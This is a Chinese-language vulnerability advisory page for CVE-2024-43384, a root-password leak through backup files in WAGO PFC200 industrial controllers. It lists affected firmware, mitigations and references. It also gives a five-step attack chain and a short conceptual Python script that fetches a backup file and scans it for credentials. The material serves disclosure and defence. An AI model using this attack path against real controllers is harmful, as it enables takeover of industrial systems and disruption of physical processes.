CVE-2024-43384 CVSS 8.0 高危

CVE-2024-43384 WAGO PFC200敏感信息泄露漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-43384

漏洞类型

信息泄露

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WAGO PFC200

漏洞概述

CVE-2024-43384是WAGO PFC200控制器中的高危漏洞。由于在存储或传输前未正确移除敏感信息，低权限远程攻击者可获取root密码，进而完全接管设备，对机密性、完整性和可用性造成严重影响。

技术细节

该漏洞源于WAGO PFC200设备在生成备份文件或导出日志时，未能彻底清除包含root用户密码的敏感数据。攻击者只需具备低权限账户，通过网络交互触发特定的文件生成或下载请求。一旦获取该文件，攻击者可提取其中的root凭证，从而获得设备的最高管理权限。这使得攻击者能够执行任意系统命令、修改PLC逻辑或中断工业控制流程。

攻击链分析

STEP 1

1. 信息收集

攻击者识别网络中的WAGO PFC200设备。

STEP 2

2. 获取低权限

攻击者利用现有的低权限账户或访客权限登录设备Web界面或API。

STEP 3

3. 触发漏洞

攻击者请求下载系统备份文件或特定配置日志，该文件未经清理包含root密码。

STEP 4

4. 提取凭证

攻击者分析下载的文件，提取root账户的密码或哈希。

STEP 5

5. 完全控制

攻击者使用root凭证登录，获得设备的完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2024-43384
# Description: This script demonstrates how a low-privileged user might
# access a backup configuration file that leaks the root password.

target_url = "http://target-device-ip/backup/config.cfg"
# Attacker uses low-priv credentials or session
session = requests.Session()
# session.auth = ('low_priv_user', 'password')

try:
    print(f"[+] Attempting to download backup file from {target_url}")
    response = session.get(target_url)

    if response.status_code == 200:
        print("[+] Backup file downloaded successfully.")
        # In a real scenario, parsing logic would go here to find the password hash
        content = response.text
        if "root:" in content or "password" in content:
            print("[!] Potential sensitive information found in file.")
            # print(content)
        else:
            print("[-] No obvious sensitive pattern found, manual inspection required.")
    else:
        print(f"[-] Failed to download file. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

WAGO PFC200 Firmware < 04.06.08(11)

防御指南

临时缓解措施

如果无法立即升级固件，建议将设备隔离在独立的VLAN中，严格限制对设备Web管理界面和备份功能的访问权限，并禁用不必要的远程访问服务。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-43384
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-43384
3 Details https://www.cvedetails.com/cve/CVE-2024-43384/
4 VulDB https://vuldb.com/cve/CVE-2024-43384
5 Link https://certvde.com/en/advisories/VDE-2024-039

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表